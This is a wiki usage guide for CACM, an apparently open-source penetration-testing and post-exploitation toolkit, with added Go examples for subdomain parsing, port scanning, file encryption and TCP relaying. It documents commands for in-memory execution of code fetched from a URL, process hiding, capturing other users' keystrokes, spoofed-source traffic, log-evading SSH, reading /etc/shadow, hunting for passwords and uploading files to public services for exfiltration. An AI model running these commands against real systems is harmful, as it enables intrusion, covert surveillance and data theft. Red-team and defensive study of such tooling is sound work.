
CACM Tool Usage Guide

RuoJi6 edited this page Aug 13, 2025 · 3 revisions


📖 Introduction

CACM (Come and catch me) is a penetration testing and post-exploitation toolkit that bundles modules for information gathering, system discovery, privilege escalation, persistence, and trace removal. It is written in Go and runs either as an interactive command shell or in single-command mode.

🚀 Quick Start

💻 Usage Methods

Launch Methods

# Interactive mode
./CACM
xhelp # View help interactively

# Single command execution mode
./CACM -c "command_name parameters"

# Display help
./CACM -h

Interactive Interface

After startup, you'll see CACM's ASCII art and welcome message:

 ▗▄▄▖ ▗▄▖  ▗▄▄▖▗▖  ▗▖
▐▌   ▐▌ ▐▌▐▌   ▐▛▚▞▜▌
▐▌   ▐▛▀▜▌▐▌   ▐▌  ▐▌
▝▚▄▄▖▐▌ ▐▌▝▚▄▄▖▐▌  ▐▌ tools

Come and catch me - Advanced Penetration Testing Tool
Version: v1.0 tools
Project: https://github.com/RuoJi6/CACM

🛠️ Core Functionality Modules

1. Information Gathering Module

sub - Subdomain Discovery

Function: Enumerate subdomains of the target domain from certificate transparency logs (crt.sh) and from ip.thc.org. Certificate transparency returns every name that ever appeared on a certificate, including expired and wildcard entries, so resolve the results before treating them as live hosts.

ATT&CK: T1590.002 (Gather Victim Network Information: DNS)

Usage:

# Query single domain
sub example.com

# Query multiple domains
sub example.com test.com

# Display detailed information
sub example.com -v

Example:

CACM> sub baidu.com
[*] Querying crt.sh for baidu.com...
[*] Found 156 subdomains from crt.sh
[*] Querying ip.thc.org for baidu.com...
[*] Found 23 additional subdomains from ip.thc.org
[+] Total unique subdomains: 179

www.baidu.com
map.baidu.com
tieba.baidu.com
zhidao.baidu.com
...
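What the crt.sh half of sub has to do with the raw response is worth seeing, because certificate transparency data is noisy: one JSON row can hold several newline-separated names, names arrive in mixed case, wildcards appear as *.host, and a naive substring match pulls in unrelated domains. The following Go program is an added example written for this guide, not CACM's own code; it assumes the documented crt.sh JSON output (?q=%25.example.com&output=json, one name_value string per row) and runs against a constructed sample so it works offline.

```go
package main

import (
	"encoding/json"
	"fmt"
	"sort"
	"strings"
)

// crtRow holds the one crt.sh JSON field this example uses. crt.sh answers
// https://crt.sh/?q=%25.example.com&output=json with a JSON array, and a
// single row's name_value may carry several newline-separated names.
type crtRow struct {
	NameValue string `json:"name_value"`
}

// UniqueSubdomains turns raw crt.sh JSON into a sorted, de-duplicated list of
// hostnames under domain. Wildcard entries (*.x) are reduced to their base
// label, names are lower-cased, and names that merely contain the domain
// (notexample.com, example.com.evil.test) are dropped.
func UniqueSubdomains(raw []byte, domain string) ([]string, error) {
	var rows []crtRow
	if err := json.Unmarshal(raw, &rows); err != nil {
		return nil, fmt.Errorf("crt.sh JSON: %w", err)
	}
	domain = strings.ToLower(strings.TrimSuffix(strings.TrimSpace(domain), "."))
	seen := make(map[string]struct{})
	for _, r := range rows {
		for _, name := range strings.Split(r.NameValue, "\n") {
			name = strings.ToLower(strings.TrimSpace(name))
			name = strings.TrimPrefix(name, "*.") // wildcard cert: keep the base name
			if name == "" {
				continue
			}
			if name != domain && !strings.HasSuffix(name, "."+domain) {
				continue // a substring match is not a subdomain
			}
			seen[name] = struct{}{}
		}
	}
	out := make([]string, 0, len(seen))
	for n := range seen {
		out = append(out, n)
	}
	sort.Strings(out)
	return out, nil
}

// sampleCrtSh is a constructed stand-in for a crt.sh response; it is not real
// data for any organisation.
const sampleCrtSh = `[
  {"name_value": "www.example.com\nexample.com"},
  {"name_value": "*.api.example.com"},
  {"name_value": "WWW.Example.com"},
  {"name_value": "mail.example.com"},
  {"name_value": "example.com.evil.test"},
  {"name_value": "notexample.com"}
]`

func main() {
	names, err := UniqueSubdomains([]byte(sampleCrtSh), "example.com")
	if err != nil {
		panic(err)
	}
	fmt.Printf("[+] Total unique subdomains: %d\n", len(names))
	for _, n := range names {
		fmt.Println(n)
	}
}
```

Resolve the names before handing them to scan; CT logs also list hosts that no longer exist.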

ws - System Information Discovery

Function: Comprehensive system information gathering including system configuration, network info, domain names, etc.

ATT&CK: T1082 (System Information Discovery)

Usage:

# Basic information gathering
ws

# Verbose mode
ws -v

# Skip network information
ws --no-network

# Output to file
ws -o system_info.txt

scan - Port Scanning

Function: Concurrent TCP port scanner with banner-based service detection, inspired by fscan

ATT&CK: T1046 (Network Service Discovery)

Usage:

# Scan single host
scan 192.168.1.1

# Scan network segment
scan 192.168.1.0/24

# Specify ports
scan 192.168.1.1 -p 22,80,443,3389

# Specify thread count
scan 192.168.1.0/24 -t 100

# Service detection
scan 192.168.1.1 -s

Example:

CACM> scan 192.168.1.1 -p 1-1000 -t 50
[*] Starting fscan-style port scan...
[*] Targets: 1 | Ports: 1000 | Threads: 50
[+] 192.168.1.1:22    SSH-2.0-OpenSSH_8.0
[+] 192.168.1.1:80    HTTP/1.1 200 OK
[+] 192.168.1.1:443   HTTPS/1.1 200 OK
[*] Scan completed in 2.3 seconds
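A minimal version of what scan -p ... -t ... does, as an added example that is neither CACM's nor fscan's code: a fixed pool of goroutines takes ports from a channel, every port gets a connect with a timeout, and an open port is given a short read deadline to collect a greeting banner. The Result, ScanPorts and ParsePorts names are this example's, not the tool's.

```go
package main

import (
	"bufio"
	"fmt"
	"net"
	"os"
	"sort"
	"strconv"
	"strings"
	"sync"
	"time"
)

// Result is one open port plus whatever the service said first.
type Result struct {
	Port   int
	Banner string
}

// ScanPorts connects to host:port for every port using up to workers
// goroutines. A connect that fails within timeout counts as closed/filtered;
// an open port is read for up to timeout to catch services that speak first
// (SSH, SMTP, FTP). HTTP needs a probe, which this example does not send.
func ScanPorts(host string, ports []int, workers int, timeout time.Duration) []Result {
	jobs := make(chan int)
	var mu sync.Mutex
	var results []Result
	var wg sync.WaitGroup
	for i := 0; i < workers; i++ {
		wg.Add(1)
		go func() {
			defer wg.Done()
			for port := range jobs {
				addr := net.JoinHostPort(host, strconv.Itoa(port))
				conn, err := net.DialTimeout("tcp", addr, timeout)
				if err != nil {
					continue
				}
				conn.SetReadDeadline(time.Now().Add(timeout))
				banner, _ := bufio.NewReader(conn).ReadString('\n') // partial on timeout is fine
				conn.Close()
				mu.Lock()
				results = append(results, Result{Port: port, Banner: strings.TrimSpace(banner)})
				mu.Unlock()
			}
		}()
	}
	for _, p := range ports {
		jobs <- p
	}
	close(jobs)
	wg.Wait()
	sort.Slice(results, func(i, j int) bool { return results[i].Port < results[j].Port })
	return results
}

// ParsePorts accepts "22,80,443" and "1-1000" style specs, mixed freely.
func ParsePorts(spec string) ([]int, error) {
	var ports []int
	for _, part := range strings.Split(spec, ",") {
		lo, hi, isRange := strings.Cut(part, "-")
		a, err := strconv.Atoi(strings.TrimSpace(lo))
		if err != nil {
			return nil, err
		}
		b := a
		if isRange {
			if b, err = strconv.Atoi(strings.TrimSpace(hi)); err != nil {
				return nil, err
			}
		}
		if a < 1 || b > 65535 || a > b {
			return nil, fmt.Errorf("bad port range %q", part)
		}
		for p := a; p <= b; p++ {
			ports = append(ports, p)
		}
	}
	return ports, nil
}

func main() {
	if len(os.Args) != 3 {
		fmt.Fprintln(os.Stderr, "usage: scan <host> <ports, e.g. 22,80,443 or 1-1000>")
		os.Exit(2)
	}
	ports, err := ParsePorts(os.Args[2])
	if err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(2)
	}
	start := time.Now()
	for _, r := range ScanPorts(os.Args[1], ports, 50, time.Second) {
		fmt.Printf("[+] %s:%d\t%s\n", os.Args[1], r.Port, r.Banner)
	}
	fmt.Printf("[*] Scan completed in %s\n", time.Since(start).Round(time.Millisecond))
}
```

Every connect, successful or not, is a log line or a flow record on the target side; the "HTTP/1.1 200 OK" banners in the example above imply the tool also sends an HTTP request, which web servers record in their access logs.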

2. System Management Module

common - Common Command Collection

Function: Provides common system management commands, inspired by hackshell

ATT&CK: T1083 (File and Directory Discovery)

Subcommands:

  • lt: List files sorted by time
  • ltr: Recursively list files sorted by time
  • lss: List files sorted by size
  • lssr: Recursively list files sorted by size
  • psg: Search processes
  • lsg: Search files

Usage:

# List current directory files by time
common lt

# Recursively list /var/log by time
common ltr /var/log

# List /tmp files by size
common lss /tmp

# Search SSH processes
common psg ssh

# Search log files
common lsg '\.log$'

xpty - Terminal User Discovery

Function: Display all terminals and logged-in user information

ATT&CK: T1033 (System Owner/User Discovery)

Usage:

# Display all terminals
xpty

# Verbose mode
xpty -v

# Show only active sessions
xpty --active

3. Tool Download Module

bin - Static Binary Downloader

Function: Download statically linked builds of common tools from a third-party binary mirror (the example below fetches from bin.pkgforge.dev). Nothing in this flow verifies what arrives, so compare a hash or signature published by the upstream project before running a fetched binary, particularly on a client's system.

ATT&CK: T1105 (Ingress Tool Transfer)

Usage:

# Download single tool
bin nmap

# Download multiple tools
bin nmap curl jq

# List all available tools
bin list

# Search tools
bin search nmap

# View download history
bin info

Available Tool Categories:

  • Network Tools: nmap, ncat, curl, wget, socat, ping, tcpdump
  • File Tools: fd, find, grep, awk, sed, ripgrep
  • System Tools: ps, netstat, ss, lsof, busybox, strace
  • Data Tools: jq, base64, hexdump, xxd
  • Security Tools: naabu, fscan, searchall, dddd, gogo

Example:

CACM> bin nmap
[*] Downloading nmap for linux/amd64...
[*] URL: https://bin.pkgforge.dev/x86_64/nmap
[+] Downloaded to: /tmp/nmap (12.3 MB)
[+] Made executable
[*] nmap is ready to use!

4. Memory Execution Module

memexec - Execute Binary in Memory

Function: Run a binary or script supplied on stdin, fetched from a URL, or read from a local path, without writing it to disk

ATT&CK: T1620 (Reflective Code Loading)

Usage:

# Execute from stdin
cat /usr/bin/id | memexec

# Download from URL and execute
memexec https://example.com/tool

# Execute local file
memexec /usr/bin/nmap -sS target.com

# Execute system command
memexec id -u

Example:

CACM> echo "#!/bin/bash\necho 'Hello from memory!'" | memexec
[*] Executing binary from stdin...
[+] Binary loaded into memory (45 bytes)
[+] Execution successful
Hello from memory!

5. Process Management Module

hide - Process Hiding

Function: Hide the given process from common discovery tools such as ps, top, and htop. How far the hiding reaches depends on the mechanism used, so confirm from a second shell that the PID is also absent from a direct listing of /proc and from ss -p output before relying on it; a userland hook would not affect kernel-level sources such as auditd or eBPF tracing.

ATT&CK: T1564 (Hide Artifacts)

Usage:

# Hide process by PID
hide 1234

# List hideable processes
hide list

# Show hiding status
hide status

# Restore hidden process
hide restore 1234

tit - User Input Monitoring

Function: Monitor and record what a user types in another terminal session. Capturing another user's shell input requires privileges over that process (normally root).

ATT&CK: T1056 (Input Capture)

Usage:

# List monitorable processes
tit list

# Monitor bash/zsh input
tit read 1234

# Monitor SSH session output
tit write 1234

# Debug mode
tit read 1234 --debug

Example:

CACM> tit list
[*] Scanning for monitorable processes...
[+] Found 3 bash processes:
  PID: 1234 - /bin/bash (user: alice)
  PID: 5678 - /bin/zsh (user: bob)
  PID: 9012 - /bin/bash (user: root)

CACM> tit read 1234
[*] Monitoring PID 1234 (/bin/bash)...
[+] Started input monitoring
[2024-01-15 10:30:15] ls -la
[2024-01-15 10:30:20] cat /etc/passwd
[2024-01-15 10:30:25] sudo su -

6. File Operations Module

enc/dec - File Encryption/Decryption

Function: Encrypt and decrypt files using AES-256-GCM

ATT&CK: T1027 (Obfuscated Files or Information)

Usage:

# Encrypt file
enc secret.txt

# Decrypt file
dec secret.txt.enc

# Specify password
enc secret.txt -p mypassword

# Batch encryption
enc *.txt

# Use environment variable
HS_TOKEN=mysecret enc file.txt
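AES-256-GCM needs a 32-byte key and a nonce that is never reused under that key, and a password is neither: it has to go through a salted key derivation, and the salt and nonce have to travel with the ciphertext. The following Go program is an added example of the file format such a feature needs (tag, salt, nonce, ciphertext with authentication tag, header bound as GCM additional data); it is not CACM's enc/dec implementation, and the CACMX1 tag, 16-byte salt and PBKDF2 iteration count are this example's own choices.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/hmac"
	"crypto/rand"
	"crypto/sha256"
	"encoding/binary"
	"errors"
	"fmt"
)

const (
	magic      = "CACMX1" // hypothetical format tag, not the tool's real header
	saltLen    = 16
	iterations = 100_000 // PBKDF2 work factor
)

// pbkdf2SHA256 is RFC 8018 PBKDF2 with HMAC-SHA256, written out so the
// example needs nothing outside the standard library.
func pbkdf2SHA256(password, salt []byte, iter, keyLen int) []byte {
	prf := hmac.New(sha256.New, password)
	hLen := prf.Size()
	var dk []byte
	ctr := make([]byte, 4)
	for block := 1; len(dk) < keyLen; block++ {
		binary.BigEndian.PutUint32(ctr, uint32(block))
		prf.Reset()
		prf.Write(salt)
		prf.Write(ctr)
		u := prf.Sum(nil)
		t := append([]byte(nil), u...)
		for i := 1; i < iter; i++ {
			prf.Reset()
			prf.Write(u)
			u = prf.Sum(nil)
			for j := 0; j < hLen; j++ {
				t[j] ^= u[j]
			}
		}
		dk = append(dk, t...)
	}
	return dk[:keyLen]
}

func gcmFor(password string, salt []byte) (cipher.AEAD, error) {
	key := pbkdf2SHA256([]byte(password), salt, iterations, 32) // 32 bytes = AES-256
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

// Encrypt returns magic || salt || nonce || ciphertext+tag. Salt and nonce are
// fresh per call, and the header is passed as GCM additional data so it
// cannot be swapped for another file's without failing authentication.
func Encrypt(password string, plaintext []byte) ([]byte, error) {
	salt := make([]byte, saltLen)
	if _, err := rand.Read(salt); err != nil {
		return nil, err
	}
	aead, err := gcmFor(password, salt)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, aead.NonceSize())
	if _, err := rand.Read(nonce); err != nil {
		return nil, err
	}
	header := append([]byte(magic), salt...)
	header = append(header, nonce...)
	return append(header, aead.Seal(nil, nonce, plaintext, header)...), nil
}

// Decrypt reverses Encrypt; a wrong password or any modified byte yields an
// error rather than garbage plaintext.
func Decrypt(password string, blob []byte) ([]byte, error) {
	if len(blob) < len(magic)+saltLen || !bytes.HasPrefix(blob, []byte(magic)) {
		return nil, errors.New("not an encrypted blob")
	}
	salt := blob[len(magic) : len(magic)+saltLen]
	aead, err := gcmFor(password, salt)
	if err != nil {
		return nil, err
	}
	hdrLen := len(magic) + saltLen + aead.NonceSize()
	if len(blob) < hdrLen+aead.Overhead() {
		return nil, errors.New("truncated blob")
	}
	nonce := blob[len(magic)+saltLen : hdrLen]
	pt, err := aead.Open(nil, nonce, blob[hdrLen:], blob[:hdrLen])
	if err != nil {
		return nil, errors.New("decryption failed: wrong password or tampered data")
	}
	return pt, nil
}

func main() {
	msg := []byte("secret contents\n")
	blob, err := Encrypt("mypassword", msg)
	if err != nil {
		panic(err)
	}
	pt, err := Decrypt("mypassword", blob)
	fmt.Printf("%d-byte blob, round trip ok: %v, err=%v\n", len(blob), bytes.Equal(pt, msg), err)
}
```

Because the salt and nonce are random per call, encrypting the same file twice yields different blobs; that is expected and is what keeps the GCM nonce from repeating under a derived key.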

shred - Secure File Deletion

Function: Overwrite file contents before deletion to hinder recovery. As with shred(1), overwriting is only effective on filesystems that rewrite blocks in place; on SSDs, copy-on-write filesystems (btrfs, ZFS), snapshots, and journaled data modes the old blocks may survive.

ATT&CK: T1070.004 (Indicator Removal: File Deletion)

Usage:

# Securely delete single file
shred sensitive.txt

# Delete multiple files
shred *.log

# Specify overwrite count
shred -n 7 secret.txt

# Delete and remove file
shred -u temp.txt

7. Network Tools Module

dns - DNS Query Tool

Function: Perform DNS queries (A, MX, TXT, reverse lookups, optionally against a chosen resolver)

ATT&CK: T1590.002 (Gather Victim Network Information: DNS)

Usage:

# Basic DNS query
dns example.com

# Specify record type
dns example.com A
dns example.com MX
dns example.com TXT

# Reverse DNS query
dns -r 8.8.8.8

# Use specific DNS server
dns example.com -s 8.8.8.8

Example:

CACM> dns baidu.com
[*] Resolving baidu.com...
[+] A Record: 110.242.68.66
[+] A Record: 39.156.66.10

CACM> dns baidu.com MX
[*] Querying MX records for baidu.com...
[+] MX: 10 mx.maillb.baidu.com
[+] MX: 15 mx1.baidu.com
[+] MX: 20 mx50.baidu.com

rdns - Batch Reverse DNS Query

Function: Perform batch reverse DNS queries on IP address ranges using multiple public databases

ATT&CK: T1590.005 (Gather Victim Network Information: IP Addresses)

Usage:

# Query single IP
rdns 8.8.8.8

# Query IP range
rdns 192.168.1.1-192.168.1.100

# Query network segment
rdns 192.168.1.0/24

# Specify thread count
rdns 192.168.1.0/24 -t 50

# Verbose mode
rdns 8.8.8.8 -v

# Output to file
rdns 192.168.1.0/24 -o rdns_results.txt

Example:

CACM> rdns 8.8.8.8
[*] Reverse DNS lookup for 8.8.8.8...
[*] Querying multiple databases...
[+] PTR: dns.google
[+] Additional info from Shodan: Google Public DNS
[+] ASN: AS15169 (Google LLC)

CACM> rdns 192.168.1.0/24 -t 20
[*] Scanning 254 IPs with 20 threads...
[+] 192.168.1.1: router.local
[+] 192.168.1.10: server01.company.local
[+] 192.168.1.15: workstation-alice.company.local
[*] Completed: 254/254 IPs scanned

dl - Multi-Protocol Download Tool

Function: Download files using multiple methods including curl/wget/python/perl/openssl or native Go HTTP client

ATT&CK: T1071.001 (Web Protocols)

Usage:

# Basic download
dl https://example.com/file.txt

# Specify output file
dl https://example.com/file.txt -o downloaded_file.txt

# Use specific method
dl https://example.com/file.txt -m curl
dl https://example.com/file.txt -m wget
dl https://example.com/file.txt -m python
dl https://example.com/file.txt -m perl
dl https://example.com/file.txt -m openssl
dl https://example.com/file.txt -m native

# Add request headers
dl https://api.example.com/data -H "Authorization: Bearer token123"

# POST request
dl https://api.example.com/submit -X POST -d "data=value"

# Set User-Agent
dl https://example.com/file.txt -A "Mozilla/5.0 Custom Agent"

# Follow redirects
dl https://short.url/redirect -L

# Silent mode
dl https://example.com/file.txt -s

Example:

CACM> dl https://github.com/user/repo/releases/download/v1.0/tool.tar.gz
[*] Downloading using native Go HTTP client...
[*] URL: https://github.com/user/repo/releases/download/v1.0/tool.tar.gz
[*] Size: 15.2 MB
[+] Downloaded to: tool.tar.gz
[*] Download completed successfully

CACM> dl https://api.github.com/repos/user/repo -H "Accept: application/vnd.github.v3+json"
[*] Using curl method...
[+] Response saved to: api_response.json

xbounce - TCP Traffic Forwarding

Function: Forward TCP traffic to destination host, implementing TCP proxy functionality

ATT&CK: T1090.001 (Internal Proxy)

Usage:

# Basic port forwarding
xbounce :8080 target.com:80

# Specify listening address
xbounce 0.0.0.0:8080 192.168.1.100:22

# Local port forwarding
xbounce 127.0.0.1:9999 internal.server:3306

# Show connection statistics
xbounce :8080 target.com:80 -v

# Run in background
xbounce :8080 target.com:80 -d

Example:

CACM> xbounce :8080 internal.server:80
[*] Starting TCP proxy...
[*] Listening on: 0.0.0.0:8080
[*] Forwarding to: internal.server:80
[+] Proxy started successfully
[*] Waiting for connections...
[+] New connection: 192.168.1.50:45678 -> internal.server:80
[*] Data transferred: 1.2KB upstream, 5.4KB downstream
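The relay xbounce describes is two io.Copy loops per connection plus the detail that decides whether connections hang: each direction must half-close its write side when the other side finishes, otherwise a client that has sent everything waits forever for the target to notice EOF. Added example in Go, not CACM's code; Proxy, Bounce and the byte counters are this example's names.

```go
package main

import (
	"fmt"
	"io"
	"log"
	"net"
	"os"
	"sync"
	"sync/atomic"
)

// Proxy is a plain TCP relay: every connection accepted on the listener is
// dialled through to target and bytes are copied in both directions.
type Proxy struct {
	ln     net.Listener
	target string
	Up     atomic.Int64 // bytes client -> target
	Down   atomic.Int64 // bytes target -> client
}

// Bounce starts relaying listenAddr -> targetAddr in the background and
// returns the running proxy; Close stops accepting new connections.
func Bounce(listenAddr, targetAddr string) (*Proxy, error) {
	ln, err := net.Listen("tcp", listenAddr)
	if err != nil {
		return nil, err
	}
	p := &Proxy{ln: ln, target: targetAddr}
	go func() {
		for {
			c, err := ln.Accept()
			if err != nil {
				return // listener closed
			}
			go p.handle(c)
		}
	}()
	return p, nil
}

func (p *Proxy) Addr() string { return p.ln.Addr().String() }
func (p *Proxy) Close() error { return p.ln.Close() }

func (p *Proxy) handle(client net.Conn) {
	defer client.Close()
	target, err := net.Dial("tcp", p.target)
	if err != nil {
		log.Printf("dial %s: %v", p.target, err)
		return
	}
	defer target.Close()
	log.Printf("[+] New connection: %s -> %s", client.RemoteAddr(), p.target)

	var wg sync.WaitGroup
	wg.Add(2)
	pipe := func(dst, src net.Conn, counter *atomic.Int64) {
		defer wg.Done()
		n, _ := io.Copy(dst, src)
		counter.Add(n)
		// Half-close the write side so the peer sees EOF instead of hanging
		// while the other direction is still draining.
		if tc, ok := dst.(*net.TCPConn); ok {
			tc.CloseWrite()
		}
	}
	go pipe(target, client, &p.Up)
	go pipe(client, target, &p.Down)
	wg.Wait()
	log.Printf("[*] Data transferred so far: %d upstream, %d downstream", p.Up.Load(), p.Down.Load())
}

func main() {
	if len(os.Args) != 3 {
		fmt.Fprintln(os.Stderr, "usage: bounce <listen-addr> <target-host:port>")
		os.Exit(2)
	}
	p, err := Bounce(os.Args[1], os.Args[2])
	if err != nil {
		log.Fatal(err)
	}
	log.Printf("[*] Listening on %s, forwarding to %s", p.Addr(), os.Args[2])
	select {} // run until killed
}
```

The relay is transparent to the target, which sees the proxy host as the client; from the network's point of view the proxy host now carries both flows, which is exactly what a flow-based detection looks for.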

xghostip - Ghost IP Network Operations

Function: Send traffic with a spoofed source address that is not assigned to any host, to make the traffic harder to attribute. This needs raw-socket privileges (root or CAP_NET_RAW); replies are addressed to the spoofed IP rather than to you, so they can only be captured if that address is routed to a segment you can sniff; and anti-spoofing filters at the network edge (BCP 38) commonly drop such packets.

ATT&CK: T1090.003 (Multi-hop Proxy)

Usage:

# Use ghost IP to send requests
xghostip 10.0.0.1 target.com

# Specify source port
xghostip 192.168.255.254 target.com -p 12345

# Send specific packets
xghostip 172.16.0.1 target.com:80 -d "GET / HTTP/1.1\r\nHost: target.com\r\n\r\n"

# Scan mode
xghostip 10.10.10.10 192.168.1.0/24 -scan

# Verbose mode
xghostip 192.168.0.1 target.com -v

Example:

CACM> xghostip 10.255.255.255 target.com:80
[*] Using ghost IP: 10.255.255.255
[*] Target: target.com:80
[*] Crafting packets with spoofed source...
[+] Packets sent successfully
[*] Response handling via raw sockets

8. System Persistence Module

xsu - User Switching and Command Execution

Function: Switch user identity and execute commands

ATT&CK: T1134.001 (Access Token Manipulation)

Usage:

# Switch to root user
xsu root

# Switch to specified user
xsu alice

# Execute single command
xsu root "id"

# Execute multiple commands
xsu alice "whoami; pwd; ls -la"

# Interactive shell
xsu root -i

# Preserve environment variables
xsu alice -e "echo $HOME"

Example:

CACM> xsu root "cat /etc/shadow | head -5"
[*] Switching to user: root
[*] Executing command: cat /etc/shadow | head -5
[+] Command executed successfully
root:$6$xyz...:18500:0:99999:7:::
daemon:*:18295:0:99999:7:::
bin:*:18295:0:99999:7:::
sys:*:18295:0:99999:7:::
sync:*:18295:0:99999:7:::

xhome - Hidden Temporary Working Directory

Function: Create and manage hidden temporary working directories

ATT&CK: T1564.001 (Hidden Files and Directories)

Usage:

# Create hidden working directory
xhome

# Specify directory location
xhome /tmp/.workspace

# Show current working directory
xhome show

# Change to working directory
xhome cd

# Clean working directory
xhome clean

# Set permissions
xhome /opt/.tools -m 700

Example:

CACM> xhome
[*] Creating hidden temporary HOME directory...
[+] Created: /tmp/.cacm_home_a8f3d2
[+] Set permissions: 700
[+] Environment updated: HOME=/tmp/.cacm_home_a8f3d2
[*] Hidden directory ready for use

CACM> xhome show
[*] Current CACM home: /tmp/.cacm_home_a8f3d2
[*] Directory contents:
  .bashrc
  .profile
  tools/

xtmux - Hidden tmux Sessions

Function: Create tmux sessions that do not appear in 'tmux list-sessions'. They are hidden only from the default tmux socket (/tmp/tmux-<uid>/default); the server is still an ordinary tmux process with a listening unix socket and is visible with ps, ss -xlp, or lsof -U.

ATT&CK: T1564.001 (Hidden Files and Directories)

Usage:

# Create hidden session
xtmux new

# Create named hidden session
xtmux new -s hidden_session

# Attach to hidden session
xtmux attach

# Attach to specific hidden session
xtmux attach -s hidden_session

# List hidden sessions
xtmux list

# Kill hidden session
xtmux kill -s hidden_session

# Execute command in hidden session
xtmux send -s hidden_session "ls -la"

Example:

CACM> xtmux new -s persistence
[*] Creating hidden tmux session: persistence
[+] Session created with hidden socket
[*] Session will not appear in 'tmux list-sessions'
[+] Connected to hidden session: persistence

# In another terminal
$ tmux list-sessions
# (persistence session won't be shown)

CACM> xtmux list
[*] Hidden tmux sessions:
  persistence (1 window, created 2024-01-15 10:30)
  backup_shell (2 windows, created 2024-01-15 09:15)

xssh - Stealth SSH Connection

Function: Log in to a remote host over SSH with client-side options meant to leave fewer traces. The example below shows the session absent from w; that is what you get when no PTY session is registered in utmp/wtmp. Nothing a client does can suppress the server's own records: sshd still logs the authentication to auth.log or the journal, and network devices still see the connection.

ATT&CK: T1021.004 (Remote Services: SSH)

Usage:

# Basic SSH connection
xssh [email protected]

# Specify port
xssh [email protected] -p 2222

# Use key file
xssh [email protected] -i /path/to/key

# Stealth mode (no logging)
xssh [email protected] --stealth

# Execute single command
xssh [email protected] "uname -a"

# Port forwarding
xssh [email protected] -L 8080:localhost:80

# Dynamic port forwarding (SOCKS proxy)
xssh [email protected] -D 1080

# Run in background
xssh [email protected] -f -N -L 8080:localhost:80

Example:

CACM> xssh [email protected] --stealth
[*] Establishing stealth SSH connection...
[*] Target: [email protected]:22
[*] Disabling host key checking...
[*] Suppressing connection logs...
[+] Connected successfully
[*] Session established with stealth features

admin@target:~$ whoami
admin
admin@target:~$ w
 10:30:15 up 5 days,  2:15,  0 users,  load average: 0.00, 0.01, 0.05
# (current connection won't show in w command output)

xscp - Stealth File Transfer

Function: Transfer files over SCP with the same client-side stealth options as xssh. The remote sshd still logs the authentication; "no traces in system logs" holds for the client side only.

ATT&CK: T1021.004 (Remote Services: SSH)

Usage:

# Upload file
xscp local_file.txt [email protected]:/tmp/

# Download file
xscp [email protected]:/etc/passwd ./

# Recursive directory transfer
xscp -r /local/dir [email protected]:/remote/dir

# Specify port
xscp -P 2222 file.txt [email protected]:/tmp/

# Use key
xscp -i /path/to/key file.txt [email protected]:/tmp/

# Stealth mode
xscp --stealth file.txt [email protected]:/tmp/

# Compressed transfer
xscp -C large_file.tar [email protected]:/tmp/

# Preserve file attributes
xscp -p file.txt [email protected]:/tmp/

Example:

CACM> xscp --stealth /etc/passwd [email protected]:/tmp/.backup
[*] Starting stealth SCP transfer...
[*] Source: /etc/passwd
[*] Destination: [email protected]:/tmp/.backup
[*] Suppressing transfer logs...
[+] Transfer completed: 2.1KB in 0.3s
[*] No traces left in system logs

9. Utility Tools Module

wfind - Writable Directory Discovery

Function: Find writable directories in the system for privilege escalation and file storage

ATT&CK: T1083 (File and Directory Discovery)

Usage:

# Find all writable directories
wfind

# Find writable directories in specific paths
wfind /var /tmp /opt

# Find directories writable by current user only
wfind --user-only

# Find world-writable directories
wfind --world-writable

# Verbose mode (show permissions)
wfind -v

# Exclude common directories
wfind --exclude-common

# Output to file
wfind -o writable_dirs.txt

Example:

CACM> wfind
[*] Scanning for writable directories...
[*] Checking common locations...
[+] /tmp (drwxrwxrwt)
[+] /var/tmp (drwxrwxrwt)
[+] /dev/shm (drwxrwxrwt)
[+] /home/alice (drwxr-xr-x)
[+] /var/log/apache2 (drwxr-xr-x)
[*] Found 5 writable directories

CACM> wfind --world-writable -v
[*] Scanning for world-writable directories...
[+] /tmp
    Permissions: drwxrwxrwt (1777)
    Owner: root:root
    Sticky bit: Yes
[+] /var/tmp
    Permissions: drwxrwxrwt (1777)
    Owner: root:root
    Sticky bit: Yes

hgrep - Human-friendly Text Search

Function: Enhanced grep functionality with formatted output and Chinese support

ATT&CK: T1083 (File and Directory Discovery)

Usage:

# Basic search
hgrep "password" /etc/

# Search for password-related information
hgrep password

# Regular expression search
hgrep -E "^admin:" /etc/passwd

# Case-insensitive search
hgrep -i "error" /var/log/

# Recursive search
hgrep -r "secret" /home/

# Search Chinese content
hgrep "密码" /var/log/

# Show line numbers
hgrep -n "config" /etc/

# Show context lines
hgrep -C 3 "error" /var/log/syslog

# Show only filenames
hgrep -l "password" /etc/*

# Exclude binary files
hgrep -I "secret" /usr/bin/

Example:

CACM> hgrep password
[*] Searching for 'password' patterns...
[*] Scanning common locations...

📁 /etc/mysql/my.cnf
   Line 15: password = secret123
   Context: Database configuration file

📁 /home/alice/.bashrc
   Line 42: export DB_PASSWORD=admin123
   Context: Environment variable

📁 /var/log/auth.log
   Line 1205: Failed password for alice from 192.168.1.100
   Context: Authentication log

[+] Found 3 matches in 3 files

find_subdomains - Subdomain File Search

Function: Search for subdomain information in files

ATT&CK: T1083 (File and Directory Discovery)

Usage:

# Search for subdomains of specified domain
find_subdomains example.com

# Search in specific directories
find_subdomains example.com /var/log /etc

# Search multiple domains
find_subdomains example.com test.com

# Verbose mode
find_subdomains example.com -v

# Output to file
find_subdomains example.com -o subdomains.txt

# Include wildcard domains
find_subdomains example.com --include-wildcards

Example:

CACM> find_subdomains company.com
[*] Searching for subdomains of company.com...
[*] Scanning configuration files...

📁 /etc/nginx/sites-available/default
   Line 25: server_name api.company.com;
   Line 30: server_name admin.company.com;

📁 /var/log/apache2/access.log
   Line 1523: "GET / HTTP/1.1" 200 - "mail.company.com"
   Line 2041: "POST /login HTTP/1.1" 302 - "vpn.company.com"

📁 /etc/hosts
   Line 15: 192.168.1.100 internal.company.com

[+] Found 5 unique subdomains:
  api.company.com
  admin.company.com
  mail.company.com
  vpn.company.com
  internal.company.com

transfer - File Upload Service

Function: Upload files or directories to public file-sharing services (transfer.sh, bashupload, oshi.at). Anything uploaded can be fetched by whoever holds the URL until it expires, so use --encrypt (or enc first) for client data.

ATT&CK: T1567.002 (Exfiltration Over Web Service: Exfiltration to Cloud Storage)

Usage:

# Upload single file
transfer file.txt

# Upload directory
transfer /path/to/directory

# Specify service
transfer file.txt --service bashupload
transfer file.txt --service transfer.sh
